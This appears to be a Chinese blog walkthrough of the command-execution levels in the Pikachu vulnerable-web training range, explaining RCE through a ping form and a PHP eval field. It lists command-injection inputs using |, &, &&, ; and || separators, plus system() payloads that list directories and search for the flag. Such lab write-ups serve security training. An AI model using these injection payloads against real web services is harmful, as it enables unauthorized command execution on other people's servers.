皮卡丘RCE靶场通关攻略

皮卡丘RCE靶场通关攻略

文章目录

RCE(remote command/code execute)概述

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

远程系统命令执行

一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口

比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上

一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交"意想不到"的命令,从而让后台进行执行,从而控制整个后台服务器

启动环境

启动靶场获得映射端口

这边地址是10.9.47.6:36162对它进行访问

漏洞练习

第一关exec "ping"

先输入地址尝试ping一下

ping完之后发现没反应

那就用我们命令注入测试语句试一下127.0.0.1|pwd

可以发现能看到目录说明存在该漏洞

接下来利用漏洞找到flag|find / |grep flag

接下来上传flag就通关了

下面是一些ping常用的注入命令

bash 复制代码
ping 127.0.0.1
127.0.0.1|whoami 
ping 127.0.0.1|whoami
127.0.0.1&whoami
127.0.0.1&&whoami 
127.0.0.1;whoami
127.0.0.1||whoami
127.0.0.0.1||whoami
127.0.0.0.1|whoami

第二关 exec "eval"

进入第二关这个是一个PHP代码的RCE利用

我们输入system函数看看能不能执行系统命令system('pwd');

发现执行成功了说明存在该漏洞,我们用漏洞找到flagsystem('find / | grep flag');

flag就找到了

相关推荐
国科安芯4 小时前
高速CANFD收发器ASM1042在割草机器人轮毂电机通信系统中的适配性研究
网络·单片机·嵌入式硬件·性能优化·机器人·硬件工程
晓梦.5 小时前
IPSec 安全基础
服务器·网络·安全
witkey_ak98966 小时前
网络安全转型书籍清单
安全·web安全
btyzadt7 小时前
虚拟机蓝屏问题排查与解决
linux·运维·网络
佩佩(@ 。 @)7 小时前
网络编程-创建TCP协议服务器
服务器·网络·tcp/ip
G_H_S_3_8 小时前
【网络运维】Shell 脚本编程:while 循环与 until 循环
linux·运维·网络·shell
jieyu11198 小时前
内网后渗透攻击--域控制器安全(1)
安全·web安全·内网渗透·域控制器安全
云川之下9 小时前
【网络】使用 DNAT 进行负载均衡时,若未配置配套的 SNAT,回包失败
运维·网络·负载均衡
2301_8016730110 小时前
实验二 Cisco IOS Site-to-Site Pre-share Key
网络·智能路由器
hqxstudying10 小时前
JAVA限流方法
java·开发语言·安全·限流